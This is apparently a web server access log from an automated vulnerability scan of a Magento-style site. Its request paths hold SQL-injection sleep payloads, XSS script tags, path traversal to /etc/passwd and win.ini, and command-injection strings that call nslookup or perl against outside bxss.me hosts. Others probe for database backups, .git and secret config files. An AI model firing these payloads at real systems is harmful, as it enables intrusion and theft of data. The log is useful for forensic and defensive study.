/acc/skin/install/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/default/css/clears.css 1 https://104.36.149.61/
/\".gethostbyname(lc(\"hitjv\".\"mzrcagts943eb.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(107).chr(78).chr(114).chr(69).\"/skin/install/default/default/css/ie7minus.css 1 -
/baSaqdLb'))%20OR%20344=(SELECT%20344%20FROM%20PG_SLEEP(15))--/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/acc/js/1%00%c0%a7%c0%a2%252527%252522/adminhtml/giftoptions/ 1 https://104.36.149.61/
/shell.php 1 -
/'\"/js/prototype/tooltip.js 1 -
/-1%20OR%202+520-520-1=0+0+0+1/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/image.js 1 -
/.%2facc/js/prototype/tooltip.js 1 https://104.36.149.61/
/|echo%20eioehb$()\\%20edsjqg\\nz^xyu||a%20%23'%20|echo%20eioehb$()\\%20edsjqg\\nz^xyu||a%20%23|\"%20|echo%20eioehb$()\\%20edsjqg\\nz^xyu||a%20%23/js/mage/adminhtml/accordion.js 1 -
/acc/js/prototype<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/validation.js 1 -
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/prototype/ 1 https://104.36.149.61/
/ol2zSbW2'%20OR%20435=(SELECT%20435%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/104_backup.sql 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/acc/js/..%2fmage/adminhtml/browser.js 1 https://104.36.149.61/
//%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/\".gethostbyname(lc(\"hitru\".\"nhyjhecna3140.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(100).chr(90).chr(108).chr(77).\"/js/prototype/tooltip_manager.js 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/js/.%2fmage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/windows/themes/ 1 https://104.36.149.61/
//%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%2 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/varien/js.js 1 https://104.36.149.61/
/acc/js/scriptaculous'\"()&%25<acx><ScRiPt%20>mxOU(9301)<%2fScRiPt>/effects.js 1 https://104.36.149.61/
/response.write(9923192*9052317)/js/mage/adminhtml/giftmessage.js 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/tooltip.js 1 -
/acc/index.php/install/wizard/beginPost//../../../../../../../../windows/win.ini%00en 1 -
/bxss.me/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/-1%20OR%203+668-668-1=0+0+0+1/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale/../../../../../Gemfile 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/prototype/debug.js 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/prototype/tooltip_manager.js 1 -
/cgi-bin/3u3iEreh.txt 1 -
/mambots/editors/fckeditor 2 -
/104.36.149.61_db.7z 1 -
/acc/.%2fjs/mage/translate.js 1 https://104.36.149.61/
/'\"/js/mage/ 1 -
/acc/skin/install/default/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/css/clears.css 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/index.php/install/ 1 https://104.36.149.61/
/-1%20OR%202+303-303-1=0+0+0+1/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/acc'\"()&%25<acx><ScRiPt%20>KwaQ(9977)<%2fScRiPt>/js/prototype/debug.js 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'0F8T'!='0F8T%25/skin/adminhtml/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/../../../../../web.config 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/sales/ 1 -
/acc/index.php/install/1some_inexistent_file_with_long_name%00.jpg/locale/ 1 https://104.36.149.61/
/dump.sql 1 -
/'\"()&%25<acx><ScRiPt%20>2DaK(9198)<%2fScRiPt>/js/mage/ 1 https://104.36.149.61/
/acc/js/%2fxfs.bxss.me/adminhtml/hash.js 1 -
/acc/skin/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/default/default/css/boxes.css 1 -
/nAkKa33U/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc/skin/install/default/%3b(nslookup%20hitjzxcxjkcjkb0cf1.bxss.me||perl%20-e%20\"gethostbyname('hitjzxcxjkcjkb0cf1.bxss.me')\")|(nslookup%20hitjzxcxjkcjkb0cf1.bxss.me||perl%20-e%20\"gethostbyname('hitjzxcxjkcjkb0cf1.bxss.me')\")&(nslookup%20hitjzxcxjkcjk 1 -
/${@print(md5(31337))}/js/mage/adminhtml/ 1 -
/modules/phpThumb/phpThumb.php 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/giftmessage.js 1 -
/Eeo6OrLW'%20OR%20138=(SELECT%20138%20FROM%20PG_SLEEP(15))--/js/prototype/extended_debug.js 1 https://104.36.149.61/
/|(nslookup%20hitwitpifxsvpb1390.bxss.me||perl%20-e%20\"gethostbyname('hitwitpifxsvpb1390.bxss.me')\")/skin/frontend/ 1 -
/1some_inexistent_file_with_long_name%00.jpg/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'z8jE'='z8jE/js/mage/adminhtml/ 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/install/default/default/css/reset.css 1 https://104.36.149.61/
/acc/skin/install/default/..%2fdefault/css/boxes.css 1 https://104.36.149.61/
/)/js/varien/js.js 1 https://104.36.149.61/
/%3b(nslookup%20hitjsexgntbnrab7a3.bxss.me||perl%20-e%20\"gethostbyname('hitjsexgntbnrab7a3.bxss.me')\")|(nslookup%20hitjsexgntbnrab7a3.bxss.me||perl%20-e%20\"gethostbyname('hitjsexgntbnrab7a3.bxss.me')\")&(nslookup%20hitjsexgntbnrab7a3.bxss.me||perl%20-e% 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/skin/adminhtml/ 1 https://104.36.149.61/
/m5G0FRtWor.cfm 1 -
/components/com_alphacontent/assets/phpthumb/phpThumb.php 1 -
/acc/index.php/install//../../../../../../../../../../../../../../../..//etc/passwd 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/mysqladmin/ 1 -
/Gulpfile.coffee 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/form.js 1 https://104.36.149.61/
/acc/index.php/install//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passwd 1 -
/${@print(md5(31337))}/skin/install/default/default/css/iestyles.css 1 -
/acc/skin/install/default/1%00%c0%a7%c0%a2%252527%252522/css/iestyles.css 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/prototype/debug.js 1 -
/acc/%3b(nslookup%20hitprthvvmieff9b4d.bxss.me||perl%20-e%20\"gethostbyname('hitprthvvmieff9b4d.bxss.me')\")|(nslookup%20hitprthvvmieff9b4d.bxss.me||perl%20-e%20\"gethostbyname('hitprthvvmieff9b4d.bxss.me')\")&(nslookup%20hitprthvvmieff9b4d.bxss.me||perl%2 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/js'\"()&%25<acx><ScRiPt%20>TmT7(9221)<%2fScRiPt>/varien/form.js 1 https://104.36.149.61/
/acc/%3b(nslookup%20hithbpzclnhje2415b.bxss.me||perl%20-e%20\"gethostbyname('hithbpzclnhje2415b.bxss.me')\")|(nslookup%20hithbpzclnhje2415b.bxss.me||perl%20-e%20\"gethostbyname('hithbpzclnhje2415b.bxss.me')\")&(nslookup%20hithbpzclnhje2415b.bxss.me||perl%2 1 -
/components/com_alphauserpoints/assets/phpThumb/phpThumb.php 1 -
/acc/js'\"()&%25<acx><ScRiPt%20>ntvJ(9294)<%2fScRiPt>/prototype/validation.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/prototype/tooltip.js 1 https://104.36.149.61/
/acc/index.php/install//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 2 -
/images/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/shells 1 -
/acc/index.php/1%00%c0%a7%c0%a2%252527%252522/wizard/config/ 1 https://104.36.149.61/
/acc/skin/install/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/css/boxes.css 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2fGemfile 1 -
/\".gethostbyname(lc(\"hitwo\".\"vuhufkgs29e2e.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(103).chr(87).chr(109).chr(68).\"/js/prototype/validation.js 1 -
//js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/skin/install/default/default/.%2fcss/reset.css 1 https://104.36.149.61/
/104db.sql 1 -
/acc/js/mage/1%00%c0%a7%c0%a2%252527%252522/events.js 1 https://104.36.149.61/
/X1aN9s6K')%20OR%20544=(SELECT%20544%20FROM%20PG_SLEEP(15))--/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/<!--/skin/install/default/default/css/iestyles.css 1 -
/WEB-INF/jboss-web.xml~ 1 -
/acc/index.php/install/wizard/locale//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 2 -
/\"%3bprint(md5(31337))%3b$a=\"/js/mage/translate.js 1 -
/if(now()=sysdate(),sleep(15),0)/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/index.php/install/wizard//../../../../../../../../../../../../../../../..//etc/passwd 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/ 1 -
/acc//mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/104db.zip 1 -
/acc/skin/.%2finstall/default/default/css/reset.css 1 https://104.36.149.61/
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/prototype/tooltip_manager.js 1 -
/.git/HEAD 5 -
/acc/%2fxfs.bxss.me/prototype/windows/ 1 -
/cgi-bin/wp-cli.yml 1 -
/acc/..%2fjs/prototype/tooltip.js 1 https://104.36.149.61/
/$(nslookup%20hitpokoskwjloe69af.bxss.me||perl%20-e%20\"gethostbyname('hitpokoskwjloe69af.bxss.me')\")/js/mage/adminhtml/wysiwyg/ 1 -
/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php 1 -
/acc/js/mage/.%2fadminhtml/flexuploader.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2fweb.config 1 -
/acc/js/%2fxfs.bxss.me/windows/themes/ 1 -
/acc/js/scriptaculous/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini.js 1 https://104.36.149.61/
/acc/js/%2fxfs.bxss.me/tooltip_manager.js 1 -
/acc/skin/install/default/default/..%2fcss/boxes.css 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/js/mage/adminhtml/1some_inexistent_file_with_long_name%00.jpg/ 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/skin/frontend/ 1 https://104.36.149.61/
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/skin/install/default/default/ 1 -
/'%3bprint(md5(31337))%3b$a='/skin/install/default/default/css/ie7minus.css 1 -
/ad.php 2 https://104.36.149.61/
/bxss.me%2ft%2fxss.html%3f%2500/skin/install/default/default/css/reset.css 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'dFG7'!='dFG7%25/js/varien/form.js 1 https://104.36.149.61/
/'\"/js/mage/adminhtml/browser.js 1 -
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/adminhtml/uploader/ 1 https://104.36.149.61/
/<!--/skin/adminhtml/ 1 -
/docker-compose-dev.yml 1 -
/104_database.tar 1 -
/acc/js/prototype/1%00%c0%a7%c0%a2%252527%252522/ 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/translate.js 1 https://104.36.149.61/
/\"%3bprint(md5(31337))%3b$a=\"/js/varien/form.js 1 -
/'.gethostbyname(lc('hitck'.'hwzfjwuz343e3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(79).chr(122).chr(80).'/skin/install/default/default/ 1 -
/'\"/skin/install/default/default/ 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/unauth/php/change_password.php/%22%3E%3Cbsrwhfttcs%3E 1 -
/$(nslookup%20hitrbnccoicsq85eb5.bxss.me||perl%20-e%20\"gethostbyname('hitrbnccoicsq85eb5.bxss.me')\")/js/mage/adminhtml/flexuploader.js 1 -
/adminer-4.6.2-en.php 1 https://104.36.149.61/
/tomcat/host-manager/html/ 1 -
/libs 2 -
/acc/index.php/install/wizard/beginPost//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd 3 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/image.js 1 https://104.36.149.61/
/&(nslookup%20hitjnbmetncexdd793.bxss.me||perl%20-e%20\"gethostbyname('hitjnbmetncexdd793.bxss.me')\")&'\\\"`0&(nslookup%20hitjnbmetncexdd793.bxss.me||perl%20-e%20\"gethostbyname('hitjnbmetncexdd793.bxss.me')\")&`'/skin/adminhtml/ 1 -
/1%00%c0%a7%c0%a2%252527%252522/js/varien/form.js 1 https://104.36.149.61/
/database.yml_original 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc/js/mage'\"()&%25<acx><ScRiPt%20>KYzi(9669)<%2fScRiPt>/adminhtml/image.js 1 https://104.36.149.61/
/acc/skin/install/default/default/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/ie7minus.css 1 -
/acc9987095/js/mage/translate.js 1 https://104.36.149.61/
/\".gethostbyname(lc(\"hitvt\".\"vzbrqpla10e97.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(118).chr(80).chr(106).chr(67).\"/js/mage/adminhtml/flexuploader.js 1 -
/cgi-bin/%c0%ae/WEB-INF/web.xml%C0%80.jsp 1 -
/acc/index.php/install/wizard/locale//../../../../../../../../windows/win.ini%00 1 -
/qnDy6ghI'))%20OR%20184=(SELECT%20184%20FROM%20PG_SLEEP(15))--/js/mage/translate.js 1 https://104.36.149.61/
/acc/skin/install/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/default/css/reset.css 1 https://104.36.149.61/
/${9999157+9999587}/js/prototype/prototype.js 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/prototype/tooltip.js 1 https://104.36.149.61/
/`(nslookup%20hitpcjnkubnvh36822.bxss.me||perl%20-e%20\"gethostbyname('hitpcjnkubnvh36822.bxss.me')\")`/skin/frontend/ 1 -
/acc/index.php/install/../../../../web.config 1 -
/acc/skin/%3b(nslookup%20hitpdhcztelgqf9b43.bxss.me||perl%20-e%20\"gethostbyname('hitpdhcztelgqf9b43.bxss.me')\")|(nslookup%20hitpdhcztelgqf9b43.bxss.me||perl%20-e%20\"gethostbyname('hitpdhcztelgqf9b43.bxss.me')\")&(nslookup%20hitpdhcztelgqf9b43.bxss.me||p 1 -
/ExXnGUnA'%3b%20waitfor%20delay%20'0:0:15'%20--%20/skin/install/default/default/ 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/js/mage/adminhtml/wysiwyg/ 1 -
/acc/index.php/install/..%2f..%2fpackage-lock.json 1 -
/acc/js/mage/adminhtml/1%00%c0%a7%c0%a2%252527%252522.js 1 https://104.36.149.61/
/acc/skin/install/default<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/default/css/iestyles.css 1 -
/OA_HTML/AppsLocalLogin.jsp 1 -
/response.write(9675169*9907866)/index.php/install/wizard/config/ 1 -
/acc/js/%3b(nslookup%20hitxiabmbcwmz6329a.bxss.me||perl%20-e%20\"gethostbyname('hitxiabmbcwmz6329a.bxss.me')\")|(nslookup%20hitxiabmbcwmz6329a.bxss.me||perl%20-e%20\"gethostbyname('hitxiabmbcwmz6329a.bxss.me')\")&(nslookup%20hitxiabmbcwmz6329a.bxss.me||per 1 -
/acc/skin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/default/default/css/boxes.css 1 https://104.36.149.61/
/`(nslookup%20hitdzirhgtinr0d1b3.bxss.me||perl%20-e%20\"gethostbyname('hitdzirhgtinr0d1b3.bxss.me')\")`/skin/adminhtml/ 1 -
/acc/'\"()&%25<acx><ScRiPt%20>QEM2(9622)<%2fScRiPt>/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/frontend/ 1 https://104.36.149.61/
/104_database.sql.tar 1 -
/1%00%c0%a7%c0%a2%252527%252522/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/..%2facc/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/-1%20OR%202+451-451-1=0+0+0+1/js/prototype/debug.js 1 https://104.36.149.61/
/backup-104.7z 1 -
/cgi-bin/appsettings.json 1 -
/acc/index.php/install/wizard/../../../../web.config 1 -
/${9999131+9999753}/js/mage/adminhtml/accordion.js 1 -
/'.gethostbyname(lc('hitnl'.'uvyzzxtc326d8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(83).chr(109).chr(71).'/skin/install/default/default/css/reset.css 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'YE4M'!='YE4M%25/js/prototype/debug.js 1 https://104.36.149.61/
/$(nslookup%20hitnqmmrneduiaf8da.bxss.me||perl%20-e%20\"gethostbyname('hitnqmmrneduiaf8da.bxss.me')\")/skin/install/default/default/ 1 -
/acc/js/%2fxfs.bxss.me/adminhtml/wysiwyg/ 1 -
/cgi-bin/.nano_history 1 -
/cgi-bin/config.ru 1 -
/stalker_portal/c/version.js 4 -
/zaLZKOdB'%20OR%20178=(SELECT%20178%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/..%2fjs/prototype/extended_debug.js 1 https://104.36.149.61/
/acc/skin/install/default/1%00%c0%a7%c0%a2%252527%252522/css/ie7minus.css 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(122).concat(73).concat(115).concat(88)+(require\"socket\"%0aSocket.gethostbyname(\"hitne\"+\"gqswvoasc2df3.bxss.me.\")[3].to_s)+\"/js/prototype/ 1 -
/jenkins/login 1 -
/1%00%c0%a7%c0%a2%252527%252522/js/mage/ 1 https://104.36.149.61/
/acc/skin/install'\"()&%25<acx><ScRiPt%20>dgnk(9303)<%2fScRiPt>/default/default/css/iestyles.css 1 https://104.36.149.61/
/&(nslookup%20hitsnabwmdady752f8.bxss.me||perl%20-e%20\"gethostbyname('hitsnabwmdady752f8.bxss.me')\")&'\\\"`0&(nslookup%20hitsnabwmdady752f8.bxss.me||perl%20-e%20\"gethostbyname('hitsnabwmdady752f8.bxss.me')\")&`'/js/mage/adminhtml/hash.js 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/prototype/extended_debug.js 1 -
/phpThumb/phpThumb.php 1 -
//%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%2/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c5c0%25ae%25c0%25ae/%25c 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/install/default/default/css/ie7minus.css 1 -
/include/javascript/tiny_mce 1 -
//db.php 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/acc/skin/install/default/default/./WEB-INF/web.xml%00.jsp 2 -
/WEB-INF.7z 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/mage/translate.js 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/install/default/default/css/reset.css 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/frontend/ 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/sales/ 1 https://104.36.149.61/
/'\"/js/mage/adminhtml/flexuploader.js 1 -
/-1%20OR%202+378-378-1=0+0+0+1/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/-1%20OR%203+582-582-1=0+0+0+1/js/varien/js.js 1 https://104.36.149.61/
/acc/skin/%2fxfs.bxss.me/default/default/css/ie7minus.css 1 -
/104.36.149.61-backup.sql.tar 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/varien/form.js 1 -
/acc/skin/adminhtml/..%2fdefault/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/config//../../../../../../../../etc/passwd%00.jsp 1 -
/acc/js/..%2fmage/adminhtml/events.js 1 https://104.36.149.61/
//..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd 1 -
/cgi-bin/phpunit.xml 1 -
/acc/%3b(nslookup%20hitzojgnqibhscabc0.bxss.me||perl%20-e%20\"gethostbyname('hitzojgnqibhscabc0.bxss.me')\")|(nslookup%20hitzojgnqibhscabc0.bxss.me||perl%20-e%20\"gethostbyname('hitzojgnqibhscabc0.bxss.me')\")&(nslookup%20hitzojgnqibhscabc0.bxss.me||perl%2 1 -
/^(%23$!@%23$)(()))******/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/.%2facc/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/lucee/admin/imgProcess.cfm 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/form.js 1 -
/K31aPGJK 1 -
/)/js/mage/translate.js 1 https://104.36.149.61/
/acc/skin/adminhtml/1%00%c0%a7%c0%a2%252527%252522/ 1 https://104.36.149.61/
/acc/js/mage/1%00%c0%a7%c0%a2%252527%252522/accordion.js 1 https://104.36.149.61/
/'.print(md5(31337)).'/skin/frontend/ 1 -
/5I3ubJRL')%20OR%20942=(SELECT%20942%20FROM%20PG_SLEEP(15))--/js/varien/js.js 1 https://104.36.149.61/
/acc/js/mage/bxss.me%2ft%2fxss.html%3f%2500/events.js 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/mage/adminhtml/flexuploader.js 1 -
/acc/js/1some_inexistent_file_with_long_name%00.jpg/prototype.js 1 https://104.36.149.61/
/cgi-bin/config/initializers/secret_token.rb 1 -
/%2fxfs.bxss.me/js/mage/adminhtml/flexuploader.js 1 -
/acc/.%2findex.php/install/wizard/config/ 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'98N7'!='98N7%25/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/editor/tinymce 1 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/adminhtml/events.js 1 https://104.36.149.61/
/acc/js/1%00%c0%a7%c0%a2%252527%252522/adminhtml/sales/ 1 https://104.36.149.61/
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/wysiwyg/ 1 -
/-1%20OR%202+668-668-1=0+0+0+1/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/BFBKkBiL'))%20OR%20552=(SELECT%20552%20FROM%20PG_SLEEP(15))--/js/varien/form.js 1 https://104.36.149.61/
/1'\"/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/js/mage'\"()&%25<acx><ScRiPt%20>JGJG(9977)<%2fScRiPt>/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.php/install/ 1 https://104.36.149.61/
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/'.gethostbyname(lc('hitdc'.'ponykdar7cc90.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(84).chr(118).chr(74).'/js/prototype/tooltip.js 1 -
//%C0%AE%C0%AE/%C0%AE%C0%AE/WEB-INF/web.xml 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/'.gethostbyname(lc('hitci'.'mncwkexrd8e6a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(83).chr(122).chr(68).'/js/mage/adminhtml/ 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/translate.js 1 -
/@@Qoyzh/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/acc/js/'\"()&%25<acx><ScRiPt%20>IUUR(9741)<%2fScRiPt>/adminhtml/giftmessage.js 1 https://104.36.149.61/
/.%2facc/js/prototype/debug.js 1 https://104.36.149.61/
/gallery/phpThumb/phpThumb.php 1 -
/acc/skin/install/default/1some_inexistent_file_with_long_name%00.jpg/css/ie7minus.css 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>PjTl(9636)<%2fScRiPt>/skin/install/default/ 1 https://104.36.149.61/
/acc/skin/install/default<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/default/css/clears.css 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/acc/skin/'\"()&%25<acx><ScRiPt%20>Lssw(9865)<%2fScRiPt>/default/default/ 1 https://104.36.149.61/
